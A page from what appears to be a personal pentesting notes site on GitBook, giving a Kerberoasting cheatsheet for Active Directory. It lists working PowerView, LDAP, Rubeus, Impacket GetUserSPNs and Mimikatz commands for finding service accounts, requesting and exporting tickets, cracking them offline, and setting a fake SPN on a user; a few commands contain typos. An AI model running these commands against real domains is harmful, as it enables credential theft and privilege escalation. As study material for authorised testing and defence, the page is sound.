💾
👁️
infosec stuff
infosec stuffwriteups
infosec stuff
infosec stuffwriteups
  • infosec stuff
  • Archive
    • Kerberos
  • Cheatsheet
    • Mimikatz
    • Rubeus
  • Initial Access
    • Passwords
    • Payloads
    • Recon-AssetDiscovery
  • Linux
    • Linux Enumeration
    • Command Cheatsheet
      • TAR
    • Privilege Escalation
      • Cron Jobs
      • Kernel Exploit
      • SUID
      • Sudo
      • Weak File Permission
  • Physical
    • Basics
  • Tools
    • Impacket
    • Msfvenom
    • psexec
  • Uncategorized
    • Alternate Data Stream
    • Check applocker rules/policy
    • UACme
    • Data Exfilteration
    • Port Forwarding
    • WebDAV Exploitation
    • WinRM
    • winexe
  • Windows
    • Windows Enumeration
    • Commands
      • net
      • reg
      • sc
    • Evasion
      • Query Installed Antivirus
    • Local Privilege Escalation
      • Automated Tools
      • Enterprise Application
      • Insecure GUI Apps
      • Kernel Exploitation
      • Passwords
      • Potato
      • Registry Exploits
      • Scheduled Tasks
      • Service Exploits
      • Startup Apps
      • Vulnerable Software
      • Windows Privileges
    • Persistence
      • Adding Privileged Users
      • Backdoor Files
      • Existing Services
      • Login Screen (RDP)
      • Logon Triggered
      • Scheduled Tasks
      • Services
    • Powershell
      • Cheatsheet
      • Detections & Bypass
    • System Programming
      • Fundamentals
    • Windows Internals
      • Process & Jobs
        • Fundamentals
        • Process Internals
      • Security
        • Access Token
        • Elevation
        • Integrity Levels
        • Privilege
        • SID
        • Security Descriptor
        • User Account Control
      • System Architecture
        • Architecture Overview
        • Operating System Model
      • Uncategorized
        • DPAPI
        • LocalAccountTokenFilterPolicy
        • Privileges
        • SID
        • accesschk.exe
        • WMI
  • Active Directory
    • AD Concepts
      • Authentication
      • Authorization
      • Basics
      • Computers
      • Credentials
      • Database
      • Group Policy
      • Groups
      • Kerberos
      • Logon Types
      • NetNTLM
      • Services
      • Trusts
      • Users
    • Credential Dumping
      • Credential Manager
      • DC Sync
      • Domain Controller
      • LAPS
      • LSASS
      • Local Credentials
    • Domain Enumeration
      • CMD
      • Credential Injection
      • Defence
      • Management Console
      • Sharphound-BloodHound
      • Powershell
        • ACLs
        • Computers
        • Domain
        • Forest
        • GPOs
        • Groups
        • Organisational Unit
        • Shares and File Servers
        • Trusts
        • Powerview
        • Users
    • Exploitation
      • ACLs
    • Initial Foothold
      • ASREPRoast
      • Kerberos
    • Lateral Movement and Pivoting
      • Abusing User Behaviour
      • Kerberos
      • NTLM
      • PSEXEC
      • Remote Windows Service
      • Schedule Tasks
      • WMI-CIM
      • WimRM (PowerShell Remoting)
    • Persistence
      • ACLs
      • Custom SSP
      • DSRM
      • Diamond Ticket
      • Golden Certificates
      • Golden Tickets
      • SID History
      • Silver Tickets
      • Skeleton Key
    • Privilege Escalation
      • Constrained Delegation
      • DNSAdmins
      • Kerberoast
      • Unconstrained Delegation
    • Protocols
      • MSRPC
      • SMB
      • WinRM
Powered by GitBook
On this page
Edit on GitHub
  1. Active Directory
  2. Privilege Escalation

Kerberoast

Last updated 6 months ago

#powerview #powershell #ldap #rubeus #mimikatz #impacket

  • ST can be requested by any user for any service if it's is registered in the domain.

  • STs are encrypted with the service account which runs the service.

  • Hence, we can try to crack the password of the service user account.

  • In case of managed service accounts, the password is of 120 characters and changes every month, hence it is not possible to crack their password.

  • However, some services are run with normal user accounts, managed by people, that can have weak password.

  • Kerberoast involves service running under regular user accounts. We can request STs for the services and crack password locally. We can query for users with SPNs using

  • Powerview

Get-NetUser -SPN

  • LDAP

(&(samAccountType=805306368)(servicePrincipalName=*))

  • AD-RSAT (Active Directory module)

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrinicipalName

  • Rubeus

# list kerberos stats
.\Rubeus.exe kerberoast /stats

# Look of kerberoastable account that only supports RC4_HMAC
.\Rubues.exe kerberoast /stat /rc4opsec

Requesting STs

  • Impacket's GetUserSPNs.py script can be used to query users with SPN and request STs for the service.

# This will search for SPNs, request STs for the same using supplied credentials and same the STs in "kerberoast.hash"
python GetUserSPNs.py mydomain.local/a.drdragon:Password!! -dc-ip <ip> -outputfile kerberoast.hash

  • Requesting a TGS using powrshell

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQL/mssqldomain.mydomain.local"
# This will add the kerberos key in memeory, and can be verified with klist
klist
# The key can be extracted with mimikatz
kerberos::list /export

  • Powerview

Request-SPNTicket

  • Rubeus

.\Rubeus kerberoast /nowrap [/user:<username>] /simple

# for rc4_hmac account
.\Rubeus kerberoast /nowrap [/user:<username>] /simple /rc4opsec

If we have GenericAll or GenericWrite over a user, we can set a random SPN for that user, and request ST for it. This is opsec friendly as resetting a user password is noisy. SPN for a user can be set using (SPN should be unique for the forest):

# Powerview
Set-DomainOjbect -Identity support30user -Set @{serviceprincipalname = 'dcorp/whatever'}

# Ad module
Set-ADUser -Identity support30user -ServicePrincipalNames @{Add='dcorp/whatever'}
SPN